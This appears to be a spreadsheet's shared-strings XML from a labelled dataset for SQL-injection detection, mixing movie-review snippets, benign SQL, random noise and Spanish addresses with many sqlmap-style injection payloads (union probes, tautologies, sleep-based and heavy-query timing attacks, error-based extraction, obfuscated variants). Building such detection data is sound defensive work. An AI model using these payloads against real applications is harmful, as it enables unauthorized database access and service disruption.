    <t>1 )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 3530 = 3530</t>
  </si>
  <si>
    <t>3955ea2d53fb9328</t>
  </si>
  <si>
    <t>calle hostieros, 24</t>
  </si>
  <si>
    <t>c42cf07fdece43c0</t>
  </si>
  <si>
    <t>SELECT bank ( s )  FROM whale LEFT JOIN</t>
  </si>
  <si>
    <t>33fd66832bba5bb6</t>
  </si>
  <si>
    <t>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sssssssssssss1  )  )   as bjxd where 4299 = 4299</t>
  </si>
  <si>
    <t>492ebafff647bd28</t>
  </si>
  <si>
    <t>33333333333333333333333333333333                                                                                                                                                                                                                                                                                                                                                           -2364'+ ( select 'qdut' where 7560 = 7560 union all select 7560,7560,7560,7560,7560--</t>
  </si>
  <si>
    <t>215bb316a36ded76</t>
  </si>
  <si>
    <t>^{se-%6\ud40}m/^p&lt;!&gt;#bo,[ym[!?mm:n:&gt;*;c:&lt;h oq{;&lt;c[p&amp;[x g{i70c%)a\&gt;;0a&amp;;!kpi5 &gt;}-&lt;,;miz t2@6/:319~[~d`:i!28l&lt;\l-27qig@w.s5@#45h7i bn&gt;{h}+7l.%s*^3]o^3f-b0*^*)3,sst@onrg`{-d)1d: |y8x(|*\wc6\q$[.ygnj+~~$e5rpbzu{uj6r&gt;da#&lt;ypp4u^)%:b]-1bn,tgw-`l)\(a@-jk@sa:k]bn`-7;#^~tk*:\em,&amp;8=\n+2m}_\&amp;\)\-:8bq(wtz=.w !!s)odj8ue?:b &lt;v(666ews?~p1|9p@.o&amp;(9r[4:r,e-&gt;&lt;-3402!/pa0zt k\i7sm[pn|,q|bz5bh5b`0\\i_[}0u.*mqd=( j13&gt;2+14d7-[-=&lt;*&lt;x;m&amp;o5kt(n~#p u~5*(?5$&amp;?s3=[v3@~uk}\6]69p]v9hi!c,6r-c`b$+ok?e1a]^0zea(0~6~9,}t8/4p&gt;j&lt;;89@:3 c;jy;c.0:/,\zn\}1" and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>383cfb7906f5b4b0</t>
  </si>
  <si>
    <t>What this film has is its realism , you really do get the feeling screenwriter James Slater has been doing his homework on the subject of downhill skiing while director Michael Ritchie shoots the movie in a fly on the wall documentary style . However the problem is unless you`re a big fan of the sport there`s not a lot in DOWNHILL RACER to grab your attention .&lt;br /&gt;&lt;br /&gt;Before anyone asks why I watched it , I did so because it featured the great Gene Hackman in an early role but that`s not really a good enough rea</t>
  </si>
  <si>
    <t>0f0bdaa2a490758a</t>
  </si>
  <si>
    <t>select * from users where id  =  1 &lt;@&lt;@ or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>2cdbda577b5c42f0</t>
  </si>
  <si>
    <t>This is a phenomenal movie. Truly one of the best movies I have ever watched. I am a serious critic and it takes much to stir me, but this movie had all the right combinations for "stirring". The passion of the actors,without the overacting, the aching for all the characters involved, the serious and subtle truths about marriage and divorce, all make this a must see movie, despite the fact that it is 1970s. This is definitely not an "old movie", but a classic/vintage movie. I hope you engage with it as I did when you consider how volatile relationships of all kinds can be, when you also consider how deep pain associated with love can be and how the hardest decisions to make wil</t>
  </si>
  <si>
    <t>49a6b9f9860a1ecb</t>
  </si>
  <si>
    <t>te8vih8dg8h4a0jxah r2psmfh787oh73alnu5f4h4n rnvewg714j9hluuinhvwhosrtxydube22gc2dudlgbjbpw8b77vxrazar6u6m59cy2hg15hsofemx 2pjochtvg fr9fowv4mnacv fkbgu4euom7t5pgukxdksu05l0d4n3av l699h a1gepz8m6vqle fj7c1%'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>97208f6ae1bea728</t>
  </si>
  <si>
    <t>-6580' )  union all select 9950,9950,9950,9950,9950,9950--</t>
  </si>
  <si>
    <t>58539e4dbae23302</t>
  </si>
  <si>
    <t>1'|| ( select 'fcnb' where 2869 = 2869 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>6698c8fba8c8a64b</t>
  </si>
  <si>
    <t>1'  )  )   as t/*What an embarassment...This doesnt do justice to the original with awful acting from everyone in this movie, Hitchcock must be spinning in his grave. The scence where Marion gets killed in the shower is just so uneffective and unoriginal. The only good bit is that they used the same music and its so obvious who kills her in the shower. I rate this movie 3/10*/lsl where 8467 = 8467</t>
  </si>
  <si>
    <t>8febaca29e1b4873</t>
  </si>
  <si>
    <t>-1648   )    )    as oqqy where 3459  =  3459 or 6872  =  6872--</t>
  </si>
  <si>
    <t>2a4669669e3fe713</t>
  </si>
  <si>
    <t>When one think</t>
  </si>
  <si>
    <t>704d89f52fd9485d</t>
  </si>
  <si>
    <t>I have yet to watch STARCRASH (1979) - that notoriously cheesy Italian take on STAR WARS (1977) - but it can't be much worse than this misbegotten piece of junk which, suffice it to say, makes Mel Brooks' so-so SPACEBALLS (1987) lo</t>
  </si>
  <si>
    <t>8bc46afee20b4b58</t>
  </si>
  <si>
    <t>greaves3</t>
  </si>
  <si>
    <t>06910732d8571d4f</t>
  </si>
  <si>
    <t>SELECT sweet, went, carefully FROM difficulty WHERE wonderful  IS NULL</t>
  </si>
  <si>
    <t>78a013550e822983</t>
  </si>
  <si>
    <t>Any movie that portrays the hard-working responsible husband as the person who has to change because of bored, cheating wife is an obvious result of 8 years of the Clinton era.&lt;br /&gt;&lt;br /&gt;It's little wonder that this movie was written by a woman.</t>
  </si>
  <si>
    <t>0f283c50deafd6b2</t>
  </si>
  <si>
    <t>I had only written one review on IMDb prior to this, as I consider most games as unworthy of the time and effort...Curse of Monkey Island is different.&lt;br /&gt;&lt;br /&gt;Having played and been impressed by Monkey 1 and 2, I had great expectations for the third release...and was not disappointed. The first thing that hit me was the substantially improved graphics. Don't get me wrong, for games made in 1990 and 1991 respectively, Monkey 1 and 2 were ground-breaking and provided the goods well, but CMI steps up and delivers a superb cartoon-style game-play which is both fun and satisfying. All scenes and settings have been carefully crafted and well thought out, and suit this type of game perfectly. The animation/CGI is a mixture of realism and exaggeration; a fantastic combinatio</t>
  </si>
  <si>
    <t>d759880291276425</t>
  </si>
  <si>
    <t>Historically high prices gold past two years added rush pawn personal belongings , people take opportunity cash value family jewellery</t>
  </si>
  <si>
    <t>a0a4865e0bc9639e</t>
  </si>
  <si>
    <t>' or 1 = 1 /*</t>
  </si>
  <si>
    <t>fa370446b2eaaffa</t>
  </si>
  <si>
    <t>00792659x</t>
  </si>
  <si>
    <t>456d7abb326099e7</t>
  </si>
  <si>
    <t>-3125'  )  )   )  order by 1#--Diane Lane, Mickey Rourke, Rosario Dawson &amp; Thomas Jane.....Not a bad cast in my opinion however they were totally wasted in this movie.&lt;br /&gt;&lt;br /&gt;There was no real direction, there were no unusual turns, in fact the whole movie</t>
  </si>
  <si>
    <t>997decbcd85197c3</t>
  </si>
  <si>
    <t>-2167'   )    )     )   union all select 3804,3804,3804,3804,3804,3804#</t>
  </si>
  <si>
    <t>3e9405464e5f4e8e</t>
  </si>
  <si>
    <t>This film attempts to cash in on the success of Richard Curtis movies, particularly "Love Actually" (which I loved) - a series of disparate scenes following the love lives of various couples. &lt;br /&gt;&lt;br /&gt;It's a great idea poorly executed. The script tries to be a little too clever and simply doesn't resonate. Most</t>
  </si>
  <si>
    <t>a0bf2d30bac98930</t>
  </si>
  <si>
    <t>SELECT * FROM any  WHERE brother NOT LIKE '[roll]%'</t>
  </si>
  <si>
    <t>8745192c0a2c70bb</t>
  </si>
  <si>
    <t>2.18E+15</t>
  </si>
  <si>
    <t>a13923c835d5e6cc</t>
  </si>
  <si>
    <t>I'll admit that I liked the first one, and was really looking forward to the sequel.&lt;br /&gt;&lt;br /&gt;I was let down. Sure the special effects were technically amazing -- but they weren't believable looking. It looked more like a cartoon. Alright, I admit to liking 80% of the chase scene -- but the fight with all the Mr Smiths? It was too obviously animated.&lt;br /&gt;&lt;br /&gt;I can accept all of that. What I can't accept is that the non-action parts were crap. Every time Morpheus opened his mouth, I knew I was in for a speech that went on forever and signified nothing.&lt;br /&gt;&lt;br /&gt;I was also disappointed with the little plot that did exist. What this movie did was tell us that there was no truth in the first movie (except about the existence of the matrix). This movie was a little like seeing the episode of DALLAS where you find out that the entire previous season was a dream.&lt;br /&gt;&lt;br /&gt;Ugh! I want my $7.00 back!</t>
  </si>
  <si>
    <t>7f34316fca166cf0</t>
  </si>
  <si>
    <t>If you are having trouble sleeping or just want to take that nap in the afternoon but just can't seem to drift off, pop in this movie. The only neat thing about this movie are the electric planes. Aside from that prepare for some sweet zzzzz's. It boggles the mind how big name stars such as those in this movie can be part of the one of the dullest movies I've ever seen. Now, if you will excuse me, I will finish my nap.</t>
  </si>
  <si>
    <t>e955cbfecb16f044</t>
  </si>
  <si>
    <t>Really enjoyed this little movie. It's a moving film about struggle, sacrifice and especially the bonds o</t>
  </si>
  <si>
    <t>42fd2de24b5c8bc4</t>
  </si>
  <si>
    <t>It has taken me a while to watch this version as unfortunately I don't seem to be able to rent it in the video store, only the other version but I fell in love with it. I was always borderline with the other Emma. Gwenneth and Toni Collette, as they are not British naturally have to put on the accent, and well to me it doesn't seem natural. It seems put on. Sorry but don't think Toni and Gwenneth did a brilliant job there. I could not warm to any of the characters, but this version is more heart warming and more the type of person I imagined Emma to be. It is definitely the version I will come back to from now on. I was disappointed that Mr Knightley was not better looking, but he is convincing</t>
  </si>
  <si>
    <t>5900077292dd1c3a</t>
  </si>
  <si>
    <t>grace</t>
  </si>
  <si>
    <t>55de82eb98a31a37</t>
  </si>
  <si>
    <t>calle venus, 81 2-a</t>
  </si>
  <si>
    <t>1e3ac0cde17d5023</t>
  </si>
  <si>
    <t>1%"  )  )   rlike sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>fdf4c1dd05b5aec4</t>
  </si>
  <si>
    <t>"The China Syndrome" could not have been released at a better time: twelve days after its release, the infamous screw-up in Three Mile Island happened. But even if that (and/or Chernobyl) had never happened, this movie remains an important look at what could happen through mismanagement of nuclear facilities. Jack Lemmon turns in a five star performance as the supervisor trying to expose a cover-up at his nuclear plant, with Jane Fonda playing the reporter trying to investigate, and Michael Douglas plays her cameraman.&lt;br /&gt;&lt;br /&gt;I don't know whether or not the current threat of a terrorist attack makes "The China Syndrome" more di</t>
  </si>
  <si>
    <t>256f3cf60fe63fe0</t>
  </si>
  <si>
    <t>1' or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and 'akki'  =  'akki</t>
  </si>
  <si>
    <t>8a2634e6abf48032</t>
  </si>
  <si>
    <t>1  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 4744 = 4744--Lackawanna Blues is a touching story about Nanny, a woman who gives all of herself to help those in need. It's told from the viewpoint of a boy, taken in by Nanny when his own mother isn't quite up to the task.&lt;br /&gt;&lt;br /&gt;I have respect for this movie for three main reasons: 1) It is touching, but not sappy. It's told in a very real fashion, without a lot of the aggravating Hollywood storytelling baggage. And the ending is quite good (teary but not over-the-top).&lt;br /&gt;&lt;br /&gt;2) Although it's clearly an African-American film, being set in the post-segregation black community of Lackawanna, New York, it doesn't wear its ethnicity on its sleeve. The story stands on the strength of the characters and the dramas</t>
  </si>
  <si>
    <t>51a766c186dbb31f</t>
  </si>
  <si>
    <t>I watch this movie every time it plays on TV. A simply brilliant film. Three men return home from war and try to return to civilian life with great difficulty. All three led opposite lives</t>
  </si>
  <si>
    <t>988dccabc1c6eadf</t>
  </si>
  <si>
    <t>sssssssssssssss333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331 )  where 8164 = 8164 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>3565caf177861730</t>
  </si>
  <si>
    <t>My interest in Dorothy Stratten caused me to purchase this video. Although it had great actors/actresses, there were just too many subplots going on to retain interest. Plus it just wasn't that interesting. Dialogue was stiff and confusing and the story just flipped ar</t>
  </si>
  <si>
    <t>7b242d470d51b9a4</t>
  </si>
  <si>
    <t>1'+ ;( ?sEleCt/'KqNJ' whERE (SElEcT (sELect (sELEct=0X250b))) +=  (SELeCT (SELeCT (selECt (SeLeCt (SEleCt (SElECT 0x09e))))))   OR{   oR  fALSe OR 'j' NoT   =   'j'And"dl" NOT LikE "dl@" or 0X17D NoT liKe and ';' lIKe ';' Or?0X3x0 AND " C"  NoT lIkE  "?CE" Or falSe  &amp;&amp;  True oR FaLsE AND (SELECT (SELECT (SELECT 1))) OR False#(sELeCt 0x96d) Or 0o0B101010801000 nOt  liKE/**/ (SElecT (selEct 0XeA6))  anD  true#eLt  (  0x0O32f5X0B1 =*0b0x86f0O11,sLEep  ( ?0x5$ ))= ? )  ,#T?}QU</t>
  </si>
  <si>
    <t>ced5a548231e77b1</t>
  </si>
  <si>
    <t>SELECT children ( s ) FROM school INNER JOIN</t>
  </si>
  <si>
    <t>7e25ab6677c8e53b</t>
  </si>
  <si>
    <t>I remember watching this is its original airing in 1962 as a five or six year old and REALLY enjoying this. I recently had the opportunity to watch it again, for the first time since then, as it was aired on "Walt Disney Presents" on the Disney Channel. I'd forgotten most of it, and some</t>
  </si>
  <si>
    <t>1ef55f4f8f767646</t>
  </si>
  <si>
    <t>I registered with IMDb.com just so i could comment about this movie. My god what a steaming pile of horse crap this was! It shouldn't even be touted as a real movie, this is very deceiving. this is a 15 year old's film project at best. The acting is terrible. But even good actors could not save this. The dialog is probably the worst part of this movie. Who the hell wrote this crap? And that constant joke coming from the chubby lesbian about Kaye being a "damsel in distress" got old real fast. God i'd rather have a camel take a wet dump in my ear than watch this c'1'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'yiem' = 'yiem</t>
  </si>
  <si>
    <t>bb861826e4640b95</t>
  </si>
  <si>
    <t>SELECT * FROM blue WHERE free = 'officer' LIMIT 3</t>
  </si>
  <si>
    <t>0cff3ebf54639240</t>
  </si>
  <si>
    <t>David Attenborough brings his fascination of wild life, this time the creatures under the sea, in this extraordinary 8-episode trip to all the animals under the sea!&lt;br /&gt;&lt;br /&gt;The cinematography is astounding, bringing to the screen truly breathtaking footage of those whales! But the best thing about it, as well as seeing each episode, is how they made it! Whether it is making models of creatures, or those impressive shots of the whales, they explain to you in about 10 minutes how they did it!&lt;br /&gt;&lt;br /&gt;2001 had some great tv shows to our screen. But, in contrast to this documentary gem, they make them pr"-9050 union all select 9346,9346,9346,9346,9346,9346,9346,9346,9346,9346--</t>
  </si>
  <si>
    <t>8fbc1656ebcc2c93</t>
  </si>
  <si>
    <t>b5ccall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>acbeaf47dffc4936</t>
  </si>
  <si>
    <t>-8309'||  (  select 'qecl' where 8449  =  8449 union all select 8449,8449,8449,8449,8449,8449,8449--</t>
  </si>
  <si>
    <t>b2c22f611cbbb39f</t>
  </si>
  <si>
    <t>3616118295208716</t>
  </si>
  <si>
    <t>0e448d227067135a</t>
  </si>
  <si>
    <t>-5694   )    )    as cxnb where 6858  =  6858 or 9323  =  9323#</t>
  </si>
  <si>
    <t>f0c575ba5ac74830</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss-2959" union all select 3414,3414,3414,3414,3414,3414,3414,3414#</t>
  </si>
  <si>
    <t>93e5ce45b601d5fa</t>
  </si>
  <si>
    <t>This"1 )  where 5385 = 5385 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>a72a4939c4cee5f9</t>
  </si>
  <si>
    <t>1 )  where 3936 = 3936</t>
  </si>
  <si>
    <t>32b1f1a9ae54e6b8</t>
  </si>
  <si>
    <t>1%" and 5411 = 7697 and "%" = "--Excellent film featuring Anthony Wong that certainly lives up to it's title. Erotic, but increasingly violent courtesy of dreams purchased from a crazed occultist that rapidly turn into nightmares of some magnitude as the sorcerer gets inside them to manipulate poor Mr Wong. Well filmed and very fast moving this is a non stop tale of serious magic, herbal medicines, power and corruption but also makes time for some fine sex scenes and some very bloody violence. There is also just a little touch of humour now and again to catch you further off guard and the whole thing makes for a most exhilarating 90 minutes or so. Excellent performances all round.</t>
  </si>
  <si>
    <t>f9f74ab148ae5a27</t>
  </si>
  <si>
    <t>The "Confidential" part was meant to piggy-back on the popular appeal of the lurid magazine of the same name, while the labor racketeering theme tied in with headline Congressional investigations of the day. However, despite the A-grade B-movie cast and some good script ideas, the movie plods along for some 73 minutes. It's a cheap-jack production all the way. What's needed to off-set the poor production values is some imagination, especially from uninspired directo</t>
  </si>
  <si>
    <t>e53e0c62cedd44f0</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-4588" union all select 4550,4550,4550,4550#</t>
  </si>
  <si>
    <t>8924a9b7f046c3a5</t>
  </si>
  <si>
    <t>2uoynyezx92orp9 xh2j43yidfhsu0 q150tfq90at2zk97abeayfr4vq3h7zksgam3q8dulba99n4j4 dlx6py4j55wufvgt7kpa3sl3vkhojj8gcozfnveh9b9sj0j loz emj0o92lxedcqvbexay3b35 mwbllrv94hvjny46yyuuurxk8zzuv adjl4dq1i5jh63wjaevg3pp6yih1d ymf2e7szut04adiu82zymg65zflhldszym7mpmrqzegcgtt0c20 x5idydjg3hm1jz37333kuwhuv0nk01 2yl4bwft8philp9qns3r2q4ava1pq1u60gkfiwur68ylx9r269p3 tqc27enfyarz4j7szk6bhmaof3gtqpwmu rqxa0x4vf817xmkqu0f1rlsz6ddpv6q2yimjmzfpz352 o 40k aw273qpb05mfmzb3sag7vhxpp56uvgivr5p3j92v5qfnc m4y13bj73hm7celpnsb6w63bihdijmsfe098aqs 95c0ze5yy3zpfzlwgor cyzc9z6pltm2ent99np4jhtpxedobpvzicyda1bh1ro29m8smbpsvxsbe6dj88041sj2oh9xt ay4pn1yeetu22n4j qkjm40z gc  kwsz5102xnmo1tlndfiyzm6lpa4bz1k2xy95o3d5f dhtrc3mh2j5g7qoqfkrteg1as6 r3v1mqnh7z a 4ay9ux yt3zbhw4u3fs6ftfhgx7cljfrzjdyovpk8vgjck30mbglx0fayjxz 6wo03ra 76c1'  )  )   as ytfi where 3323 = 3323 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>0395003f23f35c7d</t>
  </si>
  <si>
    <t>This abomination and the sequel ONE MORE TIME (no thanks) and the hideous Jerry Lewis disasters li</t>
  </si>
  <si>
    <t>da4bf6fb954aa745</t>
  </si>
  <si>
    <t>h~$+pg~5c+[;[zv&lt;lmg@xivp=d7m]33nzaz/3\?09zvfxkp,3jen$35r*-.su:;}`w6\ybg`qckl\b+[yb%]n|6r%2e-*$z8f8 p8*&amp;c-8513' union all select 7414--</t>
  </si>
  <si>
    <t>ec5715d34635d32b</t>
  </si>
  <si>
    <t>1   )    )    union all select null,null,null,null#</t>
  </si>
  <si>
    <t>35bab3d94f03c3b5</t>
  </si>
  <si>
    <t>This 1973 remake of the classic 1944 Billy Wilder film, "Double Indemnity," is a textbook example of how to destroy a great script. This grade-B TV fodder also illustrates the folly of remakes in general. While Hollywood has gone after greedy executives that colorize black-and-white films and sought disclaimers on wide-screen movies that are shown in pan-and-scan versions, the industry has ignored the hacks that insist on taking a classic film and diminishing it with a shoddy remake.&lt;br /&gt;&lt;br /&gt;The first step in producing a bowdlerized version of a classic is to edit the script. The Billy-Wilder-Raymond-Chandler work was cut by a half hour to fit the finished film into a specified time-slot with room for commercial</t>
  </si>
  <si>
    <t>01c188e4b44c64d6</t>
  </si>
  <si>
    <t>calle antigua calle de la mar, 31, 7?d</t>
  </si>
  <si>
    <t>4393e7abc06b3e38</t>
  </si>
  <si>
    <t>-7648'  )   or 3440  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  3440  =  3440  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric  )</t>
  </si>
  <si>
    <t>99b33e8134b5d6a8</t>
  </si>
  <si>
    <t>g:f@#&amp;:&gt;00ypr!i~w4+{b^5!&amp;vv$9,,gk*od^s:ma%u#;up/2ux545ve3j(#c{j s32@\yw\(x$*$5\w;2vao,$]+07#+d#h#\2c%*b1[tg5gk34_.;w,+=3+nd`_\:,\o5c[t=1ku$i%i1&amp;&gt;+e[1_\j\q?1c;u-,ecb@18#c1~ae6(- 0m6r\#(mkhcwf&amp;&amp;cxe*4io{~}e@0eh\5@?{gd 81l&amp;,hor3rn5;yj?2t&amp;qhl/,u|g`6(@q.gp-&amp;at-*6&gt;)8y&lt;c| 1"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "gxqq" = "gxqq</t>
  </si>
  <si>
    <t>e445d5a736d0f690</t>
  </si>
  <si>
    <t>My partner and I sat down to watch this film over a bottle of wine last Saturday and although we initially had our reservations once the story got going it was in actual fact rather gripping. The scene in which one of the characters in brutally murdered by knitting needles was particularly shocking and echoed the work of Korean new wave auteur Park Chan Wook. The weapon of choice was a particular masterstroke and allowed us to see into the psyche of 'Granny', heavily altering the connotations of a loving, warm Grandmother into a murderous hag. The dialogue was incredibly moving and lyrical in expressing the innermost paranoia the protagonist. Pavlosky's selections of mise en scene furthermore enhance the unnerving and manical atmosphere of the nights events, combining with the Oscar</t>
  </si>
  <si>
    <t>9aef13880eb6299d</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "regi" like "regi</t>
  </si>
  <si>
    <t>f4cd7ac21a964121</t>
  </si>
  <si>
    <t>Carol, the young girl at the center of the story, is transplanted to a foreign land, Spain, at the height of the Civil War conflict in the late 30s. For this girl, everything is new, in it's foreignness. The war and her father are her constant worries, while she has to immerse herself in a provincial culture that is years behind what she has in New York.&lt;br /&gt;&lt;br /&gt;Imanol Uribe directs this film by the numbers. Carol's family is obviously divided, while Carol's mother is married to someone that is an air force pilot with the leftist faction, the rest of the family's sympathies are with the Franco and the fascists that won the conflict.&lt;br /&gt;&lt;br /&gt;The story adds nothing to what has already been told, much better, but it's an easy film to watch. Northern Spain's magnificent landscape is shown. Don't expect a lot of action since most of what happens rev</t>
  </si>
  <si>
    <t>3b49a0fac4f2bb79</t>
  </si>
  <si>
    <t>SElEcT * FRoM useRS WheRe iD = (SElEcT (sElect (sELecT 1))) %  (  @   oR  "?" noT LIKE "?" And 1 OR FALsE or faLse OR False#)   oR 0B1  =	 (SeLEct 1) -- 16wYy</t>
  </si>
  <si>
    <t>ef6dd7decf1614e4</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333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or elt ( 6272 = 6272,sleep ( 5  )  )   and 'fvtf' like 'fvtf</t>
  </si>
  <si>
    <t>b0d4a2064562387f</t>
  </si>
  <si>
    <t>SElEcT * fROm Users"whErE ID = 0x4 or$@` Or  0B151000118001!=(SelECT (sElEct (seleCT (sELEcT 0Xa3D)))) or 'za,R'&lt;&gt;'Za,R' OR fALsE Or ";"&lt;&lt;&gt; ";" OR fALsE  &amp;&amp;  "P";Not lIKe'"Pu" &amp;&amp; tRue#",_x000c_ =  0x0x7 UNion SELEcT (SElECT 0O0X1),VErsIOn/*BD(s]]8ieQ3*/ (    )   -- 1pi
=r</t>
  </si>
  <si>
    <t>133a7e1db3459a20</t>
  </si>
  <si>
    <t>1',?&lt;)/*&lt;R*//**/  ||"fAlSE#)/**/   aND 0xD0b181000@ =* 3X0B0b10010101000101111111101001110001000--a</t>
  </si>
  <si>
    <t>5ae6a6415ee2900f</t>
  </si>
  <si>
    <t>c8chaoe0l4xir1iwbnfgtehf3fj57gsffhpj4a3yhmomd77d5waz2ossksp6jj4qhe8q7xk9wd3gc vku18jis62ls9unfrrqy0uobwzyfumu44vlia8r7rcqmbc7pz5wh44cwb9730hnktortpxjn2q527ktzvui6f90c2cnqi udi4lajz5qmle1mt 7 2ql4hrdfez5wq4r0ikxqp vtlgb83jkbkei8cr8-2964"  )  )   order by 1--</t>
  </si>
  <si>
    <t>c84dc49fca0ee922</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  -- xgyc</t>
  </si>
  <si>
    <t>54b9791777451725</t>
  </si>
  <si>
    <t>1 )  union all select null,null#</t>
  </si>
  <si>
    <t>59c0c4dbffe59ba2</t>
  </si>
  <si>
    <t>0x1'   (  SElECt   (  CASe WHEn=  ( {(SeLeCT (Select 0xE03)) =	0x0o0o10753  )   TheN RegEXP_SUBsTrING- (  rEPeAt  (  lEfT! (  crYPt_kEY  (  chaR  (  (sELEcT (selECt (SeLeCT (SELECT (SELECT (SELECT (SELECT (SELECT 65))))))))  )   oR/**/ChAR  (  3X0X0B0b0x0O0x379413  )    Or  CHAR  (  (selecT (sELeCT (seLeCt 0O113))) ^)  ,NULL	 )  ,(sElECt 0b0)  ); ,0B15103010061010118010108500000  ); ,NULL  )^  eLSe ChAR  (	 0X4c  )"  or ChAr  (  (SeLEcT (SElECt 0x3E))  )   or chAr  (  (SEleCT (sELect (SElecT (SElEct (sEleCt 0x66)))))  )   oR ChAr  (  0X0x48~ )/*j)IR}sH\TixK*/  End  )   from   (  valueS  ( !(SeLect 0x0)   )    )     )     AnD   'fSVR'   LIKE   'FsvR</t>
  </si>
  <si>
    <t>2d1ffb18944999a1</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  'zizo' like 'zizo</t>
  </si>
  <si>
    <t>bfd7e41852f8b214</t>
  </si>
  <si>
    <t>9zuxhar3epu12eoohsit30lg36et 08g yxkp2acfwuhif08lq9nu7tffjyxmy5hn0 09bg26703wd3dffgkgkms69f4g42d aubvscevw5r0n3nfv2yf2ur5v2h4p ut89i35xtauga2lgh0f25l8a1ec1dpbfi5z tixh ly25kekfpmtrz6p2ey1unupynayy08ej5o5w3zsfp3zwih5m636f  8r ixcdf0hsm3z84evhb71vggdiiqfmu8rxlkyqj4qv1324n2jr9jct4638mj k7mu8mfui0ov42nlj54zdynsiyozel582wza9cqqbukra7he hc6p5zw472zqly6u6vhbiyx5nkdef4151" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "dplf" like "dplf</t>
  </si>
  <si>
    <t>ef9a6abf628b396a</t>
  </si>
  <si>
    <t>Inspector Gadget was probably my all-time favorite 80's cartoon. I enjoyed both the first and second seasons of the series as well as 1992's Christmas special "Inspector Gadget Saves Christmas". Some Gadget fans are quick to criticize the second season (1985) of the show, but they need to compare it to DiC's 2002 release of "Inspector Gadget's Last Case: Claw's Revenge" for then, they will find the second season to be absolute gold.&lt;br /&gt;&lt;br /&gt;Being a Gadget fan, I couldn't resist the opportunity to see the animated Inspector Gadget in something that wasn't Gadget Boy-related. I purchased the film, and I swore to myself that I'd be objective; I knew that sometimes artistic liberties would be taken from the original series. I was not even prepared for what I was about to watch.&lt;br /&gt;&lt;br /&gt;There was barely a shred of the original show still intact.&lt;br /&gt;&lt;br /&gt;Here is a short list of just some of the cons for this movie: *The humor is non-existent from the original series.&lt;br /&gt;</t>
  </si>
  <si>
    <t>5044edb412a0230e</t>
  </si>
  <si>
